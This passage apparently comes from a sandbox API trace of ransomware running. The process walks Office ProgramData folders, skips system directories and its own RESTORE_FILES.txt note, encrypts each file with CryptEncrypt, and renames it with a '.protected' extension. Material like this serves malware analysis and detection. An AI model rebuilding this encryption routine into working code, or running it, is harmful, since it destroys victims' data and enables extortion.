lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.950] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.950] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.950] CloseHandle (hObject=0xb4) returned 1 [0066.951] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.protected") returned 62 [0066.951] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.protected")) returned 1 [0066.951] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="Windows") returned -1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="Program Files") returned -1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="Program Files (x86)") returned -1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="$Recycle.bin") returned 1 [0066.951] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="System Volume Information") returned -1 [0066.951] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0066.952] StrStrIW (lpFirst="DocumentRepository.ico", lpSrch=".protected") returned 0x0 [0066.952] lstrcmpW (lpString1="DocumentRepository.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.952] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.952] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.952] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.963] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0066.963] StrStrW (lpFirst="DocumentRepository.ico", lpSrch=".txt") returned 0x0 [0066.963] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0066.963] StrStrW (lpFirst="DocumentRepository.ico", lpSrch=".rar") returned 0x0 [0066.963] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned 58 [0066.963] StrStrW (lpFirst="DocumentRepository.ico", lpSrch=".zip") returned 0x0 [0066.963] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.965] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.965] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.965] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.965] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.967] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.967] CloseHandle (hObject=0xb4) returned 1 [0066.967] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.protected") returned 68 [0066.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico.protected")) returned 1 [0066.968] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="Windows") returned -1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="Program Files") returned -1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="Program Files (x86)") returned -1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="$Recycle.bin") returned 1 [0066.968] lstrcmpiW (lpString1="MySharePoints.ico", lpString2="System Volume Information") returned -1 [0066.968] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0066.968] StrStrIW (lpFirst="MySharePoints.ico", lpSrch=".protected") returned 0x0 [0066.968] lstrcmpW (lpString1="MySharePoints.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.968] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.968] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.968] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.969] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0066.969] StrStrW (lpFirst="MySharePoints.ico", lpSrch=".txt") returned 0x0 [0066.969] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0066.969] StrStrW (lpFirst="MySharePoints.ico", lpSrch=".rar") returned 0x0 [0066.969] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0066.969] StrStrW (lpFirst="MySharePoints.ico", lpSrch=".zip") returned 0x0 [0066.970] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.971] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.971] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0066.972] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.972] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0066.980] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0066.980] CloseHandle (hObject=0xb4) returned 1 [0066.981] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.protected") returned 63 [0066.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.protected")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="Windows") returned -1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="Program Files") returned -1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="Program Files (x86)") returned -1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="$Recycle.bin") returned 1 [0066.981] lstrcmpiW (lpString1="MySite.ico", lpString2="System Volume Information") returned -1 [0066.981] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0066.981] StrStrIW (lpFirst="MySite.ico", lpSrch=".protected") returned 0x0 [0066.982] lstrcmpW (lpString1="MySite.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.982] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0066.982] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0066.982] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.983] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0066.984] StrStrW (lpFirst="MySite.ico", lpSrch=".txt") returned 0x0 [0066.984] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0066.984] StrStrW (lpFirst="MySite.ico", lpSrch=".rar") returned 0x0 [0066.984] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0066.984] StrStrW (lpFirst="MySite.ico", lpSrch=".zip") returned 0x0 [0066.984] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.134] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.145] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.145] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.145] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0067.146] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0067.146] CloseHandle (hObject=0xb4) returned 1 [0067.146] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.protected") returned 56 [0067.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico.protected")) returned 1 [0067.147] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="Windows") returned -1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="Program Files") returned 1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="Program Files (x86)") returned 1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="$Recycle.bin") returned 1 [0067.147] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="System Volume Information") returned -1 [0067.147] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0067.147] StrStrIW (lpFirst="SharePointPortalSite.ico", lpSrch=".protected") returned 0x0 [0067.147] lstrcmpW (lpString1="SharePointPortalSite.ico", lpString2="RESTORE_FILES.txt") returned 1 [0067.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0067.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0067.148] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0067.229] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0067.229] StrStrW (lpFirst="SharePointPortalSite.ico", lpSrch=".txt") returned 0x0 [0067.229] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0067.229] StrStrW (lpFirst="SharePointPortalSite.ico", lpSrch=".rar") returned 0x0 [0067.229] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0067.229] StrStrW (lpFirst="SharePointPortalSite.ico", lpSrch=".zip") returned 0x0 [0067.229] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.261] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.261] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.301] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.301] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0067.301] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0067.301] CloseHandle (hObject=0xb4) returned 1 [0067.302] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.protected") returned 70 [0067.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico.protected")) returned 1 [0067.302] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0067.302] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="Windows") returned -1 [0067.302] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="Program Files") returned 1 [0067.302] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="Program Files (x86)") returned 1 [0067.303] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="$Recycle.bin") returned 1 [0067.303] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="System Volume Information") returned -1 [0067.303] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0067.303] StrStrIW (lpFirst="SharePointTeamSite.ico", lpSrch=".protected") returned 0x0 [0067.303] lstrcmpW (lpString1="SharePointTeamSite.ico", lpString2="RESTORE_FILES.txt") returned 1 [0067.303] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0067.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0067.303] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0067.304] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0067.304] StrStrW (lpFirst="SharePointTeamSite.ico", lpSrch=".txt") returned 0x0 [0067.304] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0067.304] StrStrW (lpFirst="SharePointTeamSite.ico", lpSrch=".rar") returned 0x0 [0067.304] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0067.304] StrStrW (lpFirst="SharePointTeamSite.ico", lpSrch=".zip") returned 0x0 [0067.304] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.325] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.326] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0067.326] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.326] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0067.326] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0067.326] CloseHandle (hObject=0xb4) returned 1 [0067.327] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.protected") returned 68 [0067.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.protected" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico.protected")) returned 1 [0067.328] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="Windows") returned -1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="Program Files") returned 1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="Program Files (x86)") returned 1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="$Recycle.bin") returned 1 [0067.328] lstrcmpiW (lpString1="UICaptions", lpString2="System Volume Information") returned 1 [0067.328] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions") returned 46 [0067.328] lstrcmpW (lpString1="UICaptions", lpString2=".") returned 1 [0067.328] lstrcmpW (lpString1="UICaptions", lpString2="..") returned 1 [0067.328] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*") returned 48 [0067.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0067.329] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.329] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.329] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.329] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.329] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.329] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\.") returned 48 [0067.329] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.329] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0067.329] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.329] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.329] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.330] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.330] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\..") returned 49 [0067.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.330] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="Windows") returned -1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="Program Files") returned -1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="Program Files (x86)") returned -1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="$Recycle.bin") returned 1 [0067.330] lstrcmpiW (lpString1="1036", lpString2="System Volume Information") returned -1 [0067.330] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036") returned 51 [0067.330] lstrcmpW (lpString1="1036", lpString2=".") returned 1 [0067.330] lstrcmpW (lpString1="1036", lpString2="..") returned 1 [0067.331] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*") returned 53 [0067.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0067.378] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.378] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.378] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.378] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.378] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.378] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\.") returned 53 [0067.378] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.378] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.406] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.406] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.406] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.406] lstrcmpiW (lpString1="..", 